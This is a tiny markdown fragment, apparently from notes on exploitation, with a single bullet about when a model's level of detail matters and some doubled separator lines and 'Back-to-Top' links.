- Sometimes not needed, sometimes a simplified model might work, sometimes minor details mather
---------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------
[Back-to-Top](./6_exploitation.md#table-of-contents) [Back-to-Top](./6_exploitation.md#table-of-contents)